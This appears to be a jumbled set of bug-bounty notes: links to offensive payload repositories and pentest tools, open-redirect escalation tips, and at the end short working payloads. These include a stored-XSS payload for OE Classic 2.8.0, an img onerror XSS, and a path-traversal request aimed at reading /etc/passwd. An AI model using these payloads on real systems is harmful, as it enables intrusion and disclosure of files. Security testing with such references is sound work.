https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md

Open redirects can be escalated at times: Open Redirect + Miconfigured OAuth App => OAuth Token Stealing Open Redirect + Filtered SSRF => SSRF Open Redirect + CRLFi => XSS Open Redirect + javascript URI => XSS Opportunities are endless.

https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/networkshttps://github.com/nccgroup/gitpwndhttps://github.com/GoVanguard/list-pentest-toolshttps://github.com/wtsxDev/Penetration-Testinghttps://github.com/ralvarep/Penetration-Testinghttps://github.com/portantier/habuhttps://github.com/noobscode/kalelhttps://github.com/koutto/jok3r

https://medium.com/bugbountywriteup/rocet-remote-code-execution-tool-11efa54654d5?source=linkShare-1764222123d3-1554423196&_branch_match_id=650513107628037146https://medium.com/bugbountywriteup/rocet-remote-code-execution-tool-11efa54654d5https://blog.scrt.ch/2018/08/24/remote-code-execution-on-a-facebook-server/https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1

https://github.com/ismailtasdelen/command-injection-payload-listhttps://github.com/fuzzdb-project/fuzzdb/blob/master/attack/os-cmd-execution/command-injection-template.txt

https://www.youtube.com/watch?v=dQ-_TO1zuvAhttps://www.youtube.com/watch?v=YYzWvXG7mjQhttps://www.youtube.com/watch?v=qLIkGJrMY9khttps://www.youtube.com/watch?v=fXdrs9b2_Ekhttps://www.youtube.com/results?search_query=OS+Command+Injection

https://www.netsparker.com/blog/web-security/transforming-self-xss-into-exploitable-xss/?utm_source=twitter.com&utm_medium=social&utm_content=transforming+self+xss+into+exploitable+xss&utm_campaign=netsparker+social+media

https://www.kitploit.com/2019/04/findomain-tool-that-use-certificate.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+PentestTools+(PenTest+Tools

OE Classic <= 2.8.0 RCE via stored XSSVulnerability #1 <BODY BACKGROUND="javascript:document.body.innerHTML='<textarea id=x>prompt(1,location);</textarea><button onclick=eval(document.getElementById('x').innerHTML)>run</button>';">body</BODY>

<img src=x & LName: onerror=prompt(0);> sometimes you will end getting Stored XSS. #bugbounty #bugbounty #tailoringXSS shoutout to @OsandaMalith for this! :)

Node 服务器将反斜杠转换为向前斜杠, 因此我们可以绕过 nginx 验证。GET /_next..................etcpasswd HTTP/1.1